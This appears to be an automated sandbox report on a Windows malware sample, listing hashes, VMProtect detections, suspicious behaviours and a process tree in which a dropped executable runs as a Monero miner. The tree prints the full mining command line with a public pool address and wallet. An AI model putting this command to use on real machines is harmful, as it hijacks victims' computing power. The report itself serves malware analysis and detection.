Analysis
-
max time kernel
147s -
max time network
83s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
26-11-2022 03:49
Static task
static1
Behavioral task
behavioral1
Sample
63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
Resource
win10v2004-20220901-en
General
-
Target
63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe
-
Size
2.2MB
-
MD5
be593691476b31e5bb478e3ee05cf87f
-
SHA1
a9f06824f8bfdb98be0d95992b0826042271170a
-
SHA256
63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8
-
SHA512
9f7128d1d9898b9f2c0f904e846b16f86c1fcfc852cf62f47a4adf9b0645ac6c1db3157c357211a1570801044d8043dc776d474f5278dc08f9f2252d81a02cc7
-
SSDEEP
49152:7Vg5tQ7axdiO2qT9zUBBl9N5HPpJ88T5UXehcb5:Rg56GyqFU59PPpJ8g5D
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
adgwijgweog.exepid process 1508 adgwijgweog.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe vmprotect C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe vmprotect C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe vmprotect behavioral1/memory/1508-59-0x00000000013C0000-0x0000000001706000-memory.dmp vmprotect behavioral1/memory/1508-61-0x00000000013C0000-0x0000000001706000-memory.dmp vmprotect behavioral1/memory/1508-63-0x00000000013C0000-0x0000000001706000-memory.dmp vmprotect -
Loads dropped DLL 1 IoCs
Processes:
63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exepid process 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
adgwijgweog.exepid process 1508 adgwijgweog.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
adgwijgweog.exedescription pid process Token: SeLockMemoryPrivilege 1508 adgwijgweog.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exedescription pid process target process PID 2036 wrote to memory of 1508 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe adgwijgweog.exe PID 2036 wrote to memory of 1508 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe adgwijgweog.exe PID 2036 wrote to memory of 1508 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe adgwijgweog.exe PID 2036 wrote to memory of 1508 2036 63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe adgwijgweog.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe"C:\Users\Admin\AppData\Local\Temp\63b5bf590a02256bc90ee277559164de6156ee567014df2cf62df91813b31bc8.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exeC:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exe -t 1 -o stratum+tcp://pool.minexmr.com:4444 -u 42NCdZTvv3WDjVJTd4ny51SXQiKhUyprE9zrP5BsjqJu9aeWqwunHK7aHFR9ya8gJf2REyYwBMDxMjiAVPMBqsVHQqJe91y -p x2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1508
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exeFilesize
1.4MB
MD58b11325f4b729b7072c050035b454759
SHA1a5a5cf1910339490ec429b605a324b74a92edb38
SHA256785d97c2c215c3c0b76c11610680f04236ef1a5c7fbcf4a86fb5f89996858b78
SHA512f7951b33eac084e4921c304840da21680fa85b05bbd6e5068e9531f63a6d2f64d3ab9d1fb166703b51cc2bc9df977171a498ac91b3e472549a1c2de9d5bdf307
-
C:\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exeFilesize
1.4MB
MD58b11325f4b729b7072c050035b454759
SHA1a5a5cf1910339490ec429b605a324b74a92edb38
SHA256785d97c2c215c3c0b76c11610680f04236ef1a5c7fbcf4a86fb5f89996858b78
SHA512f7951b33eac084e4921c304840da21680fa85b05bbd6e5068e9531f63a6d2f64d3ab9d1fb166703b51cc2bc9df977171a498ac91b3e472549a1c2de9d5bdf307
-
C:\Users\Admin\AppData\Roaming\dvigowucpu\pools.txtFilesize
196B
MD5dfecc946287051a05f43f684a0a273f1
SHA125d44d43e38621d1f423081801ad2a1a98e8c8bb
SHA256f55a47d63c5d38a6b5c2d68cf31223d3e6f2549124552c20d6501cb03f890692
SHA51294826732603828a424612f0edd011df01ddc89dc7aaebc185e775607b55064ee0f8d09c78748e6b590640e1e3413f28536739232adaa4d437e038f782498261d
-
\Users\Admin\AppData\Roaming\dvigowucpu\adgwijgweog.exeFilesize
1.4MB
MD58b11325f4b729b7072c050035b454759
SHA1a5a5cf1910339490ec429b605a324b74a92edb38
SHA256785d97c2c215c3c0b76c11610680f04236ef1a5c7fbcf4a86fb5f89996858b78
SHA512f7951b33eac084e4921c304840da21680fa85b05bbd6e5068e9531f63a6d2f64d3ab9d1fb166703b51cc2bc9df977171a498ac91b3e472549a1c2de9d5bdf307
-
memory/1508-56-0x0000000000000000-mapping.dmp
-
memory/1508-59-0x00000000013C0000-0x0000000001706000-memory.dmpFilesize
3.3MB
-
memory/1508-61-0x00000000013C0000-0x0000000001706000-memory.dmpFilesize
3.3MB
-
memory/1508-63-0x00000000013C0000-0x0000000001706000-memory.dmpFilesize
3.3MB
-
memory/2036-54-0x0000000075631000-0x0000000075633000-memory.dmpFilesize
8KB